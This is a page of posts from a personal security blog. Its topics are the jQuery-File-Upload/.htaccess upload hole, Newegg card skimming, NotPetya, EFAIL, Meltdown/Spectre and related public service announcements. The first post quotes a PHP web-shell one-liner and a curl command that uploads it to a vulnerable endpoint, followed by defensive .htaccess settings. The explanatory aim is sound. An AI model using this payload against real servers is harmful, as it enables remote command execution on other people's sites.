February 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 2019

Expand Cut Tags

No cut tags
mdlbear: (technonerdmonster)

There’s an article about a security problem getting a bit of attention lately, Apache Access Vulnerability Could Affect Thousands of Applications. Sounds really scary. Here’s a better article about it, Zero-day in popular jQuery plugin actively exploited for at least three years. Looking at those titles you might think that the problem is either with a jQuery plugin, or Apache’s .htaccess files. It’s neither. The real situation is more complicated. You might think that if you’re not using this plugin on your website, you’d be safe. You’d be wrong. You might think that patching the plugin, or the Apache web server, would solve the problem. You’d be wrong about that, too. The real problem is still there, waiting to bite you in the tail. If you don’t have a website, or don’t allow file uploads, you can stop reading now unless you’re curious. If you do, stick around (or jump to the last section if all you want is the fix).

The problem being reported

You may have noticed that the two titles up there are highlighting different aspects of the problem. There’s that “popular jQuery plugin”, blueimp/jQuery-File-Upload. People building websites use it to allow their users to upload files (e.g., cat pictures). It’s really popular – 7800 forks on GitHub, 29,000 stars; probably tens or hundreds of thousands of sites using it. And then there’s the Apache web server. Apache is even more popular – it runs some 45% of the web. Since there are presently just short of two billion websites (although all but a couple of hundred million are currently active). And more specifically and specifically htaccess files, which are used to override certain server configuration options (including security options, which is almost as scary as it sounds, but doesn’t have to be).

The specific problem is this: jQuery-File-Upload lets visitors to a web site upload their cat pictures. These get put in a directory somewhere in the server’s file system. If you’re running a website and have any sense, you’ll put that directory someplace where it can’t be seen from the web, but of course that means that your visitors can’t see the cat pictures they’ve uploaded, without you or your software doing some work, and that could be tricky.

If you have a directory that’s part of your website that you want to be invisble from the web, or visible safely (we’ll get into that a little later), there are two ways to set that up. If you have access to Apache’s configuration files, you do it there. Unfortunately that requires root access, and most of us are using shared servers and our hosting sites don’t allow that, because it would be a huge security hole if they did. The other way of configuring your site is to put a file called .htaccess somewhere on your site, and it will apply configuration overrides to that directory and everything below it. That’s a little dicey, because it’s possible to get that wrong, especially if you’re not an experienced system administrator, but if you’re operating a shared hosting service like the one I use, you have to give your users some way of setting parameters, and .htaccess is the only game in town.

Finally there’s the fact that, some ten years ago, Apache changed the defaults on their server so that .htaccess files are disabled, so the administrator has to specifically re-enable them. What does that mean?

Well, if you are allowing users to upload files, and if you put the upload directory where it can be seen from the web (meaning that people can download from it), and if you were counting on a .htaccess file to protect that directory, and if you upgraded Apache any time in the last ten years, and if you or your system administrator didn’t re-enable .htaccess files, and if you thought that your .htaccess file was still protecting you, then you have a problem. That’s a lot of “if”s, but there are an awful lot of websites.

Here’s how this situation can be exploited, as reported by a security researcher at Akamai named Larry Cashdollar, in an article titled Having The Security Rug Pulled Out From Under You.

If you can upload files to a website, all you have to do is:

1$ echo '<?php $cmd=$_GET['cmd']; system($cmd);?>' > shell.php
2$ curl -F "files=@shell.php" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

It’s not hard. The first line there creates a one-line file with some PHP code in it. The second line uploads it. Now you have a file called shell.php on the server. You can send a request for that file with a query string attached to it, and PHP will helpfully pass that string to the system, which runs it. Boom.

The problem with the reporting

Here are a couple of passages quoted from the ZDNet article:

The developer’s investigation identified the true source of the vulnerability not in the plugin’s code, but in a change made in the Apache Web Server project dating back to 2010, which indirectly affected the plugin’s expected behavior on Apache servers.

Starting with [version2.3.9], the Apache HTTPD server got an option that would allow server owners to ignore custom security settings made to individual folders via .htaccess files. This setting was made for security reasons, was enabled by default.

Actually, what happened was that the server disabled .htaccess files by default, and it was done for performance reasons – having to read .htaccess files with every request is a big performance hit. Here’s what the Apache documentation says about it:

.htaccess files should be used in a case where the content providers need to make configuration changes to the server on a per-directory basis, but do not have root access on the server system. In the event that the server administrator is not willing to make frequent configuration changes, it might be desirable to permit individual users to make these changes in .htaccess files for themselves. This is particularly true, for example, in cases where ISPs are hosting multiple user sites on a single machine, and want their users to be able to alter their configuration. [emphasis mine]

The DARKReading Article adds,

A security vulnerability is born, Cashdollar said, when a developer looks at very old documentation and uses .htaccess for authentication instead of one of the methods now suggested by the Apache Foundation.

Well, no. The documentation is still current, and it’s very clearly marked as something you shouldn’t use unless you have to. And most of the people who have vulnerable websites aren’t developers, don’t have any choice about whether to use .htaccess, and aren’t reading the docs. They’re just doing cut-and-paste from the quick-start documents that their web host provides.

What’s the real problem?

There are a couple of things that the articles I’ve refererred to didn’t mention, or just glossed over.

The first is that uploading files is a problem, and it’s been a problem since long before there was a World Wide Web! I first ran into this while running an FTP server. There are all sorts of ways file uploads can be abused. Somebody can bring down your server by uploading junk and filling your disk. They can upload malware. It has nothing at all to do with jQuery-File-Upload; this has been a problem since day 1.

The solution, if you must allow uploads, is to upload them to someplace safely outside of your website, and process them immediately – either with your server-side code, or a cron job. This is just as much common sense as not using any form data until it’s been validated and sanitized. Some languages, like Perl, give you some help with this. This is true on the client side too, if you have JavaScript. Validate your inputs! I ran into that one last week, you may remember.

The second problem is PHP. Actually, the problem is putting executable files in your website instead of someplace like a CGI script directory, or a web server. But PHP is the biggest offender. It was designed to make it so easy to build a website that anyone could do it. And everyone did.

PHP was designed to be simple. It wasn’t designed to be safe. (It has a lot of other problems, too, but that’s the big one.) See Why PHP Sucks and PHP: a fractal of bad design, for example.

The biggest problem with PHP is that it works by mixing executable executable code with the documents you’re serving to the user. Sure, it’s convenient. It’s also bad design – it’s a series of disasters waiting to happen, and this is only the most recent one.

What should you do?

  • Obviously, if you have access to your server’s configuration, you should disable .htaccess and do everything at the server level. That’s not always possible.
  • If you aren’t using PHP on your website, disable it.
  • At the very least, disable PHP in your upload directory!
  • If you want to let users upload files, put them someplace outside your document root and keep them there until you or your software can review them for safety. (When I was running an FTP server, I had separate ‘incoming’ and ‘outgoing’ directories.)

You may find Disable PHP in a directory with Apache .htaccess - Electric Toolbox helpful: just put these three lines into an .htaccess file, either at the top level of your site, or down in any directories where it’s not needed (which includes not only your upload directory but also image directories and other assets, just to be sure).

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

While you’re at it, make it so that the web server – and anyone else who isn’t you – can’t write into your website files:

1cd your_server's_document_root
2chmod -R go-w .

Have fun, be safe out there, and don’t use PHP.

Another fine post from The Computer Curmudgeon.

mdlbear: (technonerdmonster)

TL;DR: if you bought anything from Newegg between August 14th and September 18th, call your bank and get a new credit card. You can find more details in these articles: NewEgg cracked in breach, hosted card-stealing code within its own checkout | Ars Technica // Hackers stole customer credit cards in Newegg data breach | TechCrunch // Magecart Strikes Again: Newegg in the Crosshairs | Volexity // Another Victim of the Magecart Assault Emerges: Newegg

The credit-card skimming attack appears to have been done by Magecart, the organization behind earlier attacks on British Airways and Ticketmaster. If you are one of the customers victimized by one of these attacks, it's not your fault, and there isn't much you could have done to protect yourself (but read on for some tips). Sorry about that.

This article, Compromised E-commerce Sites Lead to "Magecart", gives some useful advice. (It's way at the end, of course; search for "Conclusion and Guidance".) The most relevant for users is

An effective control that can prevent attacks such as Magecart is the use of web content whitelisting plugins such as NoScript (for Mozilla’s Firefox). These types of add-ons function by allowing the end user to specify which websites are “trusted” and prevents the execution of scripts and other high-risk web content. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.

Note that I haven't tried NoScript myself -- yet. I'll give you a review when I do. They also advise selecting your online retailers carefully, but I'm not sure I'd consider, say, British Airlines to be all that dubious. (Ticketmaster is another matter.)

Impacts of a Hack on a Magento Ecommerce Website, which talks about an attack on a site using the very popular Magento platform, gives some additional advice:

Shy away from sites that require entering payment details on their own page. Instead prefer the websites that send you to a payment organization (PayPal, payment gateway, bank, etc) to complete the purchase. These payment organizations are required to have very strict security policies on their websites, with regular assessments, so they are less likely to be hacked or miss some unauthorized modifications in their backend code.

They also suggest checking to see whether the website has had recent security issues, and using credit cards with additional levels of authentication (e.g. 2FA -- two-factor authentication).

 

Things are more difficult for retailers, but the best advice (from this article, again) is

Stay away from processing payment details on your site. If your site never has access to clients’ payment details, it can’t be used to steal them even if it is hacked. Just outsource payments to some trusted third-party service as PayPal, Stripe, Google Wallet, Authorize.net, etc.

Which is the flip side of what they recommend for shoppers. If the credit card info isn't collected on your site, you're not completely safe, but it avoids many of the problems, including Magecart. Keep your site patched anyway.

If you insist on taking payment info on your own site, and even if you don't, the high-order bit is this paragraph:

E-commerce site administrators must ensure familiarity and conformance to recommended security controls and best practices related to e-commerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also third-party plugins and related components. [emphasis mine]

Be careful out there! links )

Another fine post from The Computer Curmudgeon, cross-posted to computer-curmudgeon.com.

mdlbear: (technonerdmonster)

Actually two PSAs.

First: Especially if you're running Windows, you ought to go read The Untold Story of NotPetya, the Most Devastating Cyberattack in History | WIRED. It's the story of how a worldwide shipping company was taken out as collateral damage in the ongoing cyberwar between Russia and the Ukraine. Three takeaways:

  1. If you're running Windows, keep your patches up to date.
  2. If you're running a version of Windows that's no longer supported (which means that you can't keep it patched, by definition), either never under any circumstances connect that box to a network, or wipe it and install an OS that's supported.
  3. If at all possible, keep encrypted offline backups of anything really important. (I'm not doing that at the moment either. I need to fix that.) If you're not a corporation and not using cryptocurrency, cloud backups encrypted on the client side are probably good enough.

Second: I don't really expect that any of you out there are running an onion service. (If you had to click on that link to find out what it is, you're not.) But just in case you are, you need to read Public IP Addresses of Tor Sites Exposed via SSL Certificates, and make sure that the web server for your service is listening to 127.0.0.1 (localhost) and not 0.0.0.0 or *. That's the way the instructions (at the "onion service" link above) say to set it up, but some people are lazy. Or think they can get away with putting a public website on the same box. They can't.

If you're curious and baffled by the preceeding paragraph, Tor (The Onion Router) is a system for wrapping data packets on the internet in multiple layers of encryption and passing them through multiple intermediaries between you and whatever web site you're connecting with. This will protect both your identity and your information as long as you're careful! An onion service is a web server that's only reachable via Tor.

Onion services are part of what's sometimes called "the dark web".

Be safe! The network isn't the warm, fuzzy, safe space it was in the 20th Century.

Another public service announcement from The Computer Curmudgeon.

mdlbear: (wtf-logo)

If you're using the popular social/money-transfer phone app Venmo check your privacy settings!! It seems that the default is that every transaction you make is public! It is difficult for me to express just how broken this is. In case you're having trouble grasping the implications, just go to PUBLIC BY DEFAULT - Venmo Stories of 2017. There you will find profiles of five unsuspecting Venmo users -- one of them is a cannabis retailer -- whose transactions were among the over two hundred thousand exposed to public view during 2017.

The site is a project of Mozilla Media Fellow Hang Do Thi Duc. She has some other interesting things on her site.

It's worth noting that Venmo is owned by PayPal, and that according to a PayPal spokesperson quoted in this article on Gizmodo the public-by-default nature of person-to-person transfers (person-to-business transactions are private) is apparently a deliberate feature, not a bug.

“Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this,” a company spokesperson told Gizmodo, asserting that the “safety and privacy” of its users is a “top priority.”

Yeah. Right.

Here are more articles at The Guardian, Lifehacker, and CNET.

"We make it default because it's fun to share [information] with friends in the social world," a Venmo representative told CNET Friday. "[We've seen that] people open up Venmo to see what their family and friends are up to."

Because it's fun. Kind of puts it in the same category as other "fun" things like cocaine, binge drinking, and unprotected sex, doesn't it?

This has been a public service announcement from The Computer Curmudgeon. With a tip of the hat to Thnidu.

efail

2018-05-15 07:41 am
mdlbear: (technonerdmonster)

If your mail client automatically decrypts mail, read this!

There's no need to panic, but you should immediately disable and/or uninstall plugins that automatically decrypt PGP-encrypted or S/MIME email. The linked article tells you how.

The vulnerability is called EFAIL (the obligatory website with clever name), and allows an attacker to read your encrypted email, in effect "over your shoulder", by sending you a modified version of the encrypted message. They can do this by evesdropping, compromising an email account or server, etc. The attack is based on the way active content, such as images, is handled in HTML email.

Short term: No decryption in email client. The best way to prevent EFAIL attacks is to only decrypt S/MIME or PGP emails in a separate application outside of your email client. Start by removing your S/MIME and PGP private keys from your email client, then decrypt incoming encrypted emails by copy&pasting the ciphertext into a separate application that does the decryption for you. That way, the email clients cannot open exfiltration channels. This is currently the safest option with the downside that the process gets more involved.

Short term: Disable HTML rendering. The EFAIL attacks abuse active content, mostly in the form of HTML images, styles, etc. Disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking EFAIL. Note that there are other possible backchannels in email clients which are not related to HTML but these are more difficult to exploit.

Links below:

  @ EFAIL Paper [PDF]
  @ Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated]
  @ Attention PGP Users: New Vulnerabilities Require You To Take Action Now | EFF
  @ Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw | EFF

This has been a public service announcement from The Computer Curmudgeon.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

TL;DR: Patch your computer NOW! (Or as soon as you can, if you're running Windows or Ubuntu and reading this on Monday -- the official release date for this information was supposed to have been Tuesday January 9th.)

Unless you've been hiding under a rock all weekend, you probably know that Meltdown and Spectre have nothing to do with either nuclear powerplants or shady investments: they are, instead, recently-revealed, dangerous design flaws in almost all recent computers. Meltdown affects primarily Intel processors (i.e. most desktops, laptops, and servers), and will be mitigated (Don't you just love that word? It doesn't mean "fixed", it means "made less severe". That's accurate.) by the recent patches to Linux, Windows, and MacOS. Spectre is harder to exploit, but also harder to fix, and may well present serious problems going forward.

But what the heck are they? I'm going to try to explain that in terms a non-geek can understand. Geeks can find the rest of the details in the links, if they haven't already chased them down themselves. (And if you're in software or IT and you haven't, you haven't been paying attention.)

Briefly, these bugs are hardware design problems that allow programs to get at information belonging to other programs. In the case of Meltdown, the other program is the operating system; with Spectre, it's other application programs. The information at risk includes things like passwords, credit card and bank account numbers, and cryptographic keys. Scared yet?

Basically, it all comes down to something called "speculative execution", which means something like "getting stuff done ahead of time just in case it's needed." And carefully putting things back the way they were if it turned out you didn't. That's where it gets tricky.

Modern computers are superscalar, which means that they achieve a lot of their impressive speed by doing more than one operation at once, and playing fast-and-loose with the order they do them in when it doesn't matter. Sometimes they make tests (like, "is this number greater than zero?", or "is that a location the program doesn't have permission to read?"), and do something different depending on the result. That's called a "branch", because the program can take either of two paths.

But if the computer is merrily going along executing instructions before it needs their results, it doesn't know which path to take. So, in the case of Spectre, it speculates that it's going to be the same path as last time. If it guesses wrong (and Spectre makes sure that it will by going down the safe path first), the computer will get an instruction or two down the wrong path before it has to turn back and throw away any results it got. Spectre makes it do something with those results that leaves a trace.

In the case of Meltdown, the test that's going down the wrong path is to see whether the program is trying to read from memory that belongs to the operating system kernel -- that's the part of the OS that's always there, managing resources like memory and files, creating and scheduling processes, and keeping programs from getting into places where they aren't permitted. (There's a lot of information in the kernel's memory, including personal data and passwords; for this discussion you just need to know that leaking it would be BAD.) When this happens, the memory-management hardware interrupts the program before it receives its ill-gotten data; normally the result is that the program is killed. End of story. On Intel processors, though, there's a way the program can say something like "if this instruction causes an interrupt, just pretend it never happened." The illegally-loaded data is, of course, thrown away.

Meltdown works because the operating system's memory is -- or was -- part of the same "address space" as the application program. The application can try to read the kernel's memory; it just gets stopped if it tries. After Tuesday's patch, the two address spaces are going to be completely separate, so the program can't even try -- the kernel's address space simply isn't there. (There's a performance hit, because switching between the two address spaces takes time -- that's why they were together in the first place.)

At this point you know what Spectre and Meltdown do, but you may be wondering how they manage to look at data that simply isn't there any more, because the instruction that loaded it was canceled. (If you're not wondering that, you can stop here.) The key is in the phrase "any more". During the brief time when the data is there, the attacker can do something with it that can still be detected later. The simplest way is by warming the cache.

Suppose you go out to your car on an icy morning and the hood feels warm. Maybe one of the local hoodlums took it out for a joyride, or maybe one of the neighbor's cows was sitting on it. You can tell which it was by starting the engine and seeing whether it's already warmed up. (We're assuming that the cow doesn't know how to hotwire a car.) The attack program does almost the same thing.

The computer's CPU (Central Processing Unit) chip is really fast. It can execute an instruction in less than a nanosecond. Memory, on the other hand, is comparatively slow, in part because it's not part of the CPU chip -- electrical signals travel at pretty close to the speed of light, which is roughly a foot per nanosecond. There's also some additional hardware in the way (including the protection stuff that Meltdown is sneaking past), which slows things down even further. We can get into page tables another time.

The solution is for the CPU to load more memory than it needs and stash (or cache) it away in very fast memory that it can get to quickly, on the very sensible grounds that if it needs something from location X now, it's probably going to want the data at X+1 or somewhere else in the neighborhood pretty soon. The cache is divided into chunks called "lines" that are all loaded into the cache together. (Main memory is divided into "pages", but as I mentioned in the previous paragraph that's another story.)

When it starts a load operation, the first thing the CPU does is check to see whether the data it's loading is in the cache. If it is, that's great. Otherwise the computer has to go load it and the other bytes in the cache line from wherever it is in main memory, "warming up" the cache line in the process so that the next access will be fast. (If it turns out not to be anyplace the program has access to, we get the kind of "illegal access exception" that Meltdown takes advantage of.)

The point is, it takes a lot longer to load data if it's not in the cache. If one of the instructions that got thrown away loaded data that wasn't in the cache, that cache line will still be warm and it will take less time to load data from it. So one thing the attack program can do is to look at a bit in the data it's not supposed to see, and if it's a "1", load something that it knows isn't in the cache. That takes only two short instructions, so it can easily sneak in and get pre-executed.

Then, the attack program measures how long it takes to load data from that cache line again. (One of the mitigations for the spectre attack is to keep Javascript programs -- which might come from anywhere, and shouldn't be able to read your browser's stored passwords and cookies -- from getting at the high-resolution timers that would let them measure load time.)

Here under the cut are a basic set of references, should you wish to look further. Good stuff to read while your patches are loading.

Notes & links )

mdlbear: "Sometimes it's better to light a flamethrower than to curse the darkness" - Terry Pratchett (flamethrower)

Advisory 01/2014: Drupal - pre Auth SQL Injection Vulnerability

A "highly critical public service announcement" from Drupal [LWN.net] "Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement."

Impressive. I think this is an appropriate place to quote one of my father's aphorisms: "A locked car with an open window is NOT a locked car."

If PHP is your open window, you may as well leave the keys on the dashboard where they're easy to see.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
raw notes )

A very productive couple of days at work; I hit my (largely symbolic) code freeze deadline yesterday evening at 5pm, in spite of having spent far too much time in meetings. There's another, very hard, very real handover deadline coming up on Monday -- I'll be spending the rest of the week documenting and testing.

I walked a little yesterday, and a full three miles on Monday. I was actually present in the moment for much of Monday's walk, and noticed that it felt better than when I spend the time worrying or beating myself up over things I should have done years ago. Not that there isn't plenty of time for that.

I also finished the data-entry for taxes, ran my summary program (which sorts the expenses into categories that are easy for me to put into the forms), and imported last year's data into The Program Formerly Known As TaxCut (henceforth probably TPFKATC).

One of the most annoying things about modern GUI software is that it has no notion of "current directory" even if you start it from a command line in the damned directory; it thinks that you want to put everything in "Documents" or some-such, and often won't even do you the courtesy of exporting into the same directory you saved the document into. Sometimes that's useful, e.g. if you're working on only one project at a time and all your exported .wav files (to give a current example) go into the same directory. If you jump around between projects it's annoying as heck.

I've been reading How To Be Happy, available for free on 17000 Days. There's a section on optimism, which had a different definition from the one I'm used to; you'll also find it in this post. I've always said that I'm a pessimist because I like pleasant surprises. But I've never much liked surprises of any kind, and I'm obviously not expecting any pleasant ones. The definition in the book is:

The biggest difference between optimists and pessimists is that optimists assume good things are permanent and pervade every area of their lives, but assume bad things are temporary and isolated to their limited context.

Pessimists, obviously, assume the opposite. So I'm a pessimist because I expect anything pleasant to be a surprise -- unplanned, unlikely, and temporary. It makes a difference.

As for links, there were several good ones, mostly about computer security. State of Texas exposes data on 3.5 million people is one -- the money quote is:

Often when I am talking with people at shows and seminars I ask them if they have an encryption program in place. Nearly always the answer is "Of course! We have deployed encryption to over 80% of our laptops already."

I then ask about the servers, databases and other critical storage locations of sensitive data and I see a scary look in their eyes... They usually respond with "Oh, that's OK, that information is all inside of our firewall."

Yeah, right.

The other one, Security researcher warns over Dropbox authentication security flaw, is kind of obvious. I mean, if you set up automatic syncing with someplace on the net, it's obvious that your credentials are going to be stored on your local machine, and can be exposed if your account is compromised. Duh.

mdlbear: (borg)

Google uses an unreliable bot to determine what documents are "appropriate" to share.

Yeah, I have my websites on a hosting service. But I have the master copy at home.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Schneier on Security: Choosing Secure Passwords
Ever since I wrote about the 34,000 MySpace passwords I analyzed, people have been asking how to choose secure passwords.

My piece aside, there's been a lot written on this topic over the years -- both serious and humorous -- but most of it seems to be based on anecdotal suggestions rather than actual analytic evidence. What follows is some serious advice.

The attack I'm evaluating against is an offline password-guessing attack. This attack assumes that the attacker either has a copy of your encrypted document, or a server's encrypted password file, and can try passwords as fast as he can. There are instances where this attack doesn't make sense. ATM cards, for example, are secure even though they only have a four-digit PIN, because you can't do offline password guessing. And the police are more likely to get a warrant for your Hotmail account than to bother trying to crack your e-mail password. Your encryption program's key-escrow system is almost certainly more vulnerable than your password, as is any "secret question" you've set up in case you forget your password.

Offline password guessers have gotten both fast and smart. AccessData sells Password Recovery Toolkit, or PRTK. Depending on the software it's attacking, PRTK can test up to hundreds of thousands of passwords per second, and it tests more common passwords sooner than obscure ones.

So the security of your password depends on two things: any details of the software that slow down password guessing, and in what order programs like PRTK guess different passwords.
Don't recall where I found the link for this one; probably Don Marti. Good advice in any case.
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
E-passport: E-Passports Can Be Hacked and Cloned in Minutes
Tests conducted for the UK's Times Online have concluded that the new high-tech e-passports being distributed around the world can be hacked and cloned within minutes. A computer researcher proved it by cloning the chips in two British passports and then implanting digital images of Osama bin Laden and a suicide bomber. Both passports passed as genuine by UN approved passport reader software. The entire process took less than an hour.
mdlbear: (hacker glider)

Security is like sex. Once you're penetrated you're ****ed.

(From this comment on a slashdot post titled "Mac OS X Root Escalation Through AppleScript". Punctuation unchanged from the original.)

mdlbear: (kill bill)

It isn't (Seattle Times)

Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB "thumb drive" that was quietly distributed to a handful of law-enforcement agencies last June. Microsoft General Counsel Brad Smith described its use to the 350 law-enforcement experts attending a company conference Monday.

The device contains 150 commands that can dramatically cut the time it takes to gather digital evidence, which is becoming more important in real-world crime, as well as cybercrime. It can decrypt passwords and analyze a computer's Internet activity, as well as data stored in the computer.

It also eliminates the need to seize a computer itself, which typically involves disconnecting from a network, turning off the power and potentially losing data. Instead, the investigator can scan for evidence on site.

More than 2,000 officers in 15 countries, including Poland, the Philippines, Germany, New Zealand and the United States, are using the device, which Microsoft provides free.

Not surprisingly, there is discussion on slashdot and techdirt. Fortunately, an easy-to-install upgrade has just been released that fixes the problem.

mdlbear: (hacker glider)
... encrypted PDFs at 11.

Bruce Schneier's Security Matters: Prediction -- RSA Conference Will Shrink Like a Punctured Balloon
For a while now I have predicted the death of the security industry. Not the death of information security as a vital requirement, of course, but the death of the end-user security industry that gathers at the RSA Conference. When something becomes infrastructure -- power, water, cleaning service, tax preparation -- customers care less about details and more about results. Technological innovations become something the infrastructure providers pay attention to, and they package it for their customers.

No one wants to buy security. They want to buy something truly useful -- database management systems, Web 2.0 collaboration tools, a company-wide network -- and they want it to be secure. They don't want to have to become IT security experts. They don't want to have to go to the RSA Conference. This is the future of IT security.

You can see it in the large IT outsourcing contracts that companies are signing -- not security outsourcing contracts, but more general IT contracts that include security. You can see it in the current wave of industry consolidation: not large security companies buying small security companies, but non-security companies buying security companies. And you can see it in the new popularity of software as a service: Customers want solutions; who cares about the details?
... unless they're Microsoft customers, of course. (from techdirt)
mdlbear: (xo)
... not to mention the XO, which hasn't told me its official name yet. Right now it's just going by "steve", which is the name I gave it when I first booted it. I think that, with a reasonable window manager on it instead of the kid-oriented sugar, it will probably be fine. Or maybe with Debian -- I've been noticing lots of ways in which Fedora's package manager sucks compared to apt.

The biggest problem so far is that it seems to use control-O -- even when you're in terminal mode and ssh'ed to a machine running emacs -- to open the journal application. This is Not A Good Thing when your favorite LJ and mail clients are emacs modes. I've been reluctant to find out what other pootentially-vital keystrokes it eats.

On the other hand, my scheme to carry a basically naked machine across the border and pull in my keys from an encrypted tarball from home worked perfectly. Actually i didn't bother encrypting my ssh identity because it's *already* encrypted with a good passphrase. And the tarball's been deleted by now; I only needed it for a day.

Note to self: if we're going to play this game on a regular basis, the travel keyboard and mouse are essential. I currently have the XO's screen flipped around (halfway to tablet mode) so I can use my Thinkpad keyboard and a travel mouse. Works great.
mdlbear: (distress)

Good post on privacy vs. security, with reference links, posted by [livejournal.com profile] alobar. Via [livejournal.com profile] meglimir.

In a Jan. 21 "New Yorker" article, Director of National Intelligence Michael McConnell discusses a proposed plan to monitor all -- that's right, *all* -- Internet communications for security purposes, an idea so extreme that the word "Orwellian" feels too mild.

This is really just a matter of formalizing what's been widely suspected for years: that the NSA has been monitoring all the phone and Internet communications it can get to.

"The land of the free and the home of the brave..."

Yeah, right. Try this version.

Security?

2008-01-16 03:42 pm
mdlbear: (distress)
Techdirt: TSA Staffer Hires Buddies To Build Insecure Website For Folks Falsely On Watch List
We've had so many stories of government computer systems or websites that have terrible security or are just useless (but expensive!) that it shouldn't surprise us to hear of another one. Yet, there's always someone who can go a step further. Witness the news that the TSA's website for individuals who find themselves incorrectly on the security watchlist has been found to be insecure, with hundreds of falsely accused travelers exposing personal details by using the site. Even better, it turns out that the company that was hired to build the site got the job in a no-bid contract (meaning there wasn't any competition -- it was just chosen) and the guy responsible for figuring out who to hire just so happened to have been a former employee at that company. So, basically, what happened was that a guy who had taken a job at the TSA hired his former coworkers, with no competition for the job and apparently little oversight, to just build a website that turned out to be insecure. And, of course, without any oversight, it took months before anyone even noticed the site was insecure. And, remember, that this is the TSA we're talking about here -- an organization who's main concern is supposed to be security. I feel safer already.
Why am I not surprised by this? The original article is on InformationWeek.

Do you feel safer?
mdlbear: (hacker glider)
Security expert Bruce Schneier, in a Wired article titled Steal This Wi-Fi, writes
Whenever I talk or write about my own security setup, the one thing that surprises people -- and attracts the most criticism -- is the fact that I run an open wireless network at home. There's no password. There's no encryption. Anyone with wireless capability who can see my network can use it to access the internet.

To me, it's basic politeness. Providing internet access to guests is kind of like providing heat and electricity, or a hot cup of tea. But to some observers, it's both wrong and dangerous.
He then goes on to explain why it isn't dangerous. I found it from this Techdirt post, but it's really nothing new: I've had an open access point at the Starport ever since I installed it.

It's very simple, really: everything wireless is treated as "outside the firewall" as far as anything inside, on the wired network, is concerned. It's behind a router that blocks outgoing port 25 (SMTP) to make life hard on drive-by spammers; everything else is open going out. Coming in from the big, bad Internet, nothing gets through except http, dns, and ssh. And from there to my wired network nothing gets in except http, dns, ssh, and ipp (so people can print, as long as they know the URL of one my printers). That's it.
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
| Sentry® Safe | QE5541 FIRE-SAFE® Water Resistant SAFE
The world's first and only fire and water resistant safe that provides USB powered connectivity. Allows users to backup data using their own 2 1/2" storage device. Protects up to 120 CD's and DVD's. Users connect to their laptop or desktop via the external USB port.
$519 and, in my opinion, worth it. They have smaller models as well, all the way down to a little box that only holds a drive and a few CDs.
you know you want to see it... )
mdlbear: (mp3-pen)
Portable Devices Pose Growing IT Security Threat
Jeff Moss, organizer of the DefCon hacking convention, said the lack of an industry standard for encrypting data on portable drives is hampering efforts to boost the security of such devices.

“Something definitely needs to be done because these devices definitely get lost or stolen or [are] given to friends,” said Moss.
Gotta watch out for those friends, all right. But "an industry standard for encrypting data on portable drives" isn't the solution. What are you going to do? Hand out a 256-bit key with every device? And what will you store the key on?
Joe Gabanksi, network administrator for the city of Lake Forest, Ill., said municipal IT personnel first noticed a problem with portable devices after distributing removable storage devices to employees about two years ago.

Officials hoped to help employees more easily transport data, but found after a scan of the IT environment that a host of unauthorized devices were also linked to the network. At that point, Gabanksi said, the city’s IT managers realized that the unofficial policy of connectivity-at-will needed to tightened.

“We found considerably more activity on the network than we had ever anticipated,” he said. “We had the iPod, digital music players [and] universal flash drives. We were shocked to see how much end users had already used them.”

Gabanksi said the discovery spurred concerns over how to monitor and manage data coming in and out of his environment. Thus, the city moved to require that users register any devices they wish to connect to the corporate network.
Well, you can lock down every machine on your network so that it won't boot from removable media, and encrypts everything that it writes to a USB drive or CD-ROM (using some form of obligatory key escrow so that when the machine crashes you don't lose everything it wrote), but that only works within a closed and very tightly-controlled organization where hardly anyone has to share data with anyone else. As soon as you want to hand somebody a batch of files on an encrypted drive, you have to deal with key management.

It's a tough problem, all right. I really admire that problem. Thoughts?
mdlbear: (hacker glider)

How Online Criminals Make Themselves Tough to Find, Near Impossible to Nab -- Good article on computer forensics and its limitations.

Despite all that, casting doubt over evidence is just a secondary benefit of antiforensics for criminals. Usually cases will never get to the legal phase because antiforensics makes investigations a bad business decision. This is the primary function of antiforensics: Make investigations an exercise in throwing good money after bad. It becomes so costly and time-consuming to figure out what happened, with an increasingly limited chance that figuring it out will be legally useful, that companies abandon investigations and write off their losses. Business leaders start to say, I cant be paying $400 an hour for forensics that arent going to get me anything in return, says Liu. The attackers know this. They contaminate the scene so badly youd have to spend unbelievable money to unravel it. They make giving up the smartest business decision.

Pretty sobering stuff.

mdlbear: (sureal time)
» Vista Speech Command exposes remote exploit | George Ou | ZDNet.com
The latest bit of entertainment from Microsoft is that if you have speech recognition turned on in Vista, your computer will blythly listen to whatever comes out of its own speakers. So you can create a sound file or a movie, put it on a website, and give commands to the computer of anyone stupid enough to be running Vista and speech recognition when they listen to it.

I'm waiting for somebody to combine this with Goodbye-Microsoft.com. There's a song in there somewhere, I fancy.

(From techdirt.com; spotted by [livejournal.com profile] mr_kurt.)
mdlbear: (kill bill)
Vista security spec 'longest suicide note in history'
VISTA'S CONTENT PROTECTION specification could very well constitute the longest suicide note in history, claims a new and detailed report from the University of Auckland in New Zealand.

